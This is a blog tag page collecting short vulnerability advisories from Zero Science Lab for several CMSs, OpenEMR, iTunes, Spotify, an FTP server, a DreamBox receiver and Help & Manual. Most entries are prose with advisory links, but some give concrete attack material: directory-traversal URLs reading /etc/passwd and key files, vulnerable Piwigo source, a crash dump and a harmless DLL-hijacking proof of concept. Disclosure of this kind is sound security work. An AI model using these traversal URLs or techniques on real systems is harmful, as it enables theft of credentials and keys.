Posts Tagged ‘ exploit

Qool CMS v2.0 RC2 Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities

Qool CMS suffers from multiple persistent cross-site scripting vulnerabilities. The issues are triggered when input passed via several POST parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site. Also, Qool CMS allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Qool CMS XSS

Advisory ZSL-2013-5133: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5133.php
Advisory ZSL-2013-5134: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5134.php

OpenEMR 4.1.1 (site param) Remote XSS Vulnerability

OpenEMR suffers from a XSS issue due to a failure to properly sanitize user-supplied input to the ‘site’ GET parameter in the central ‘globals.php’ script which is called by every script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user’s browser session.

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5129.php

Vendor: http://www.open-emr.org/wiki/index.php/OpenEMR_Patches

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

Input passed to the ‘dl’ parameter in ‘install.php’ script is not properly sanitised before being used to get the contents of a resource or delete files. This can be exploited to read and delete arbitrary data from local resources with the permissions of the web server via directory traversal attack.


/install.php:
-------------

113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116: header('Cache-Control: no-cache, must-revalidate');
117: header('Pragma: no-cache');
118: header('Content-Disposition: attachment; filename="database.inc.php"');
119: header('Content-Transfer-Encoding: binary');
120: header('Content-Length: '.filesize($filename));
121: echo file_get_contents($filename);
122: unlink($filename);
123: exit();
124: }



Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php

Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow

The vulnerability is caused due to a boundary error in the processing of a playlist file, which can be exploited to cause a heap based buffer overflow when a user opens e.g. a specially crafted .M3U file. Successful exploitation could allow execution of arbitrary code on the affected node.

 

Apple: http://support.apple.com/kb/HT5318
ZSL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5093.php

TXT: http://www.zeroscience.mk/codes/itunes_bof.txt

Artiphp CMS 5.5.0 Database Backup Disclosure Exploit

Artiphp stores database backups using backupDB() utility with a predictable file name inside the web root, which can be exploited to disclose sensitive information by downloading the file. The backup is located in ‘/artzone/artpublic/database/’ directory as ‘db_backup_[type].[yyyy-mm-dd].sql.gz’ filename.

Advisory ID: ZSL-2012-5091
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5091.php

Spotify 0.8.2.610 (search func) Memory Exhaustion Exploit

The vulnerability is caused due to the Search box function not checking the boundary of user input. This can be exploited to cause a DoS due to memory exhaustion when inserting a long string of bytes (~80mil B / 80 MB) into the Search field in the GUI.

Advisory ID: ZSL-2012-5082
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5082.php

Mini FTP Server 1.1 Buffer Corruption Remote Denial Of Service Exploit

MiniFTPServer suffers from a denial of service vulnerability when passing large number of bytes after authentication, resulting in a crash. No need for a valid FTP command to exploit this issue.

dbg output:

(1540.918): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00e4f900 ebx=00000000 ecx=00000000 edx=00f163e8 esi=00e4f900 edi=055ef384
eip=031187d3 esp=055ef154 ebp=055ef394 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
031187d3 3909 cmp dword ptr [ecx],ecx ds:0023:00000000=????????
0:011> d edx
00f163e8 80 6a 9f 7a 28 f9 c5 00-00 00 00 00 64 f1 dc 00 .j.z(…….d…
00f163f8 54 72 f1 00 00 00 00 00-00 00 00 00 01 00 00 80 Tr…………..
00f16408 00 00 00 00 4c 64 f1 00-00 00 00 00 00 00 00 00 ….Ld……….
00f16418 18 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16428 b0 f1 dc 00 01 00 00 00-00 00 00 00 00 00 00 00 …………….
00f16438 00 00 00 00 00 00 00 00-f4 01 00 00 50 f9 e4 00 …………P…
00f16448 00 00 00 00 68 b4 b9 79-00 00 00 00 70 64 f1 00 ….h..y….pd..
00f16458 00 00 00 00 00 00 00 00-00 00 00 00 80 72 f1 00 ………….r..
0:011> d
00f16468 00 00 00 00 00 00 00 00-f0 b0 5c 7b 00 00 00 00 ……….\{….
00f16478 80 9f b9 00 84 64 f1 00-00 00 01 00 60 9e b9 79 …..d……`..y
00f16488 c4 1a a0 00 00 00 00 00-00 00 00 00 ac f9 b9 79 ……………y
00f16498 f4 01 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ….A.A.A.A.A.A.
00f164a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
00f164d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.


Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5040.php

Multiple vulnerabilities in Pacer Edition CMS

Pacer Edition CMS suffers from multiple vulnerabilities including cross-site scripting, local file inclusion and arbitrary file deletion. You can view details of the issues on the following advisory links:

Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit [ZSL-2011-5017]
Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability [ZSL-2011-5018]
Pacer Edition CMS 2.1 (l param) Local File Inclusion Vulnerability [ZSL-2011-5019]

DreamBox DM500(+) Arbitrary File Download Vulnerability

Dreambox suffers from a file download vulnerability thru directory traversal with appending the ‘/’ character in the HTTP GET method of the affected host address. The attacker can get to sensitive information like paid channel keys, usernames, passwords, config and plug-ins info, etc.

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00

http://192.168.1.102/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5013.php

Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit

Help & Manual Professional Edition 5.5.1 (ijl15.dll) DLL Hijacking Exploit

Vendor: EC Software GmbH
Product web page: http://www.helpandmanual.com
Affected version: 5.5.1 Build 1296

Summary: Help & Manual 5 is a single-source help authoring and content
management system for both single and multi-author editing.

Desc: Help & Manual suffers from a DLL hijacking vulnerability that enables
the attacker to execute arbitrary code on the affected machine. The vulnerable
extensions are hmxz, hmxp, hmskin, hmx, hm3, hpj, hlp and chm thru ijl15.dll
Intel’s library.

Tested on: Microsoft Windows XP Professional SP3 EN

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
liquidworm gmail com

Advisory ID: ZSL-2011-5009
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php

06.04.2011


#include

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5009.php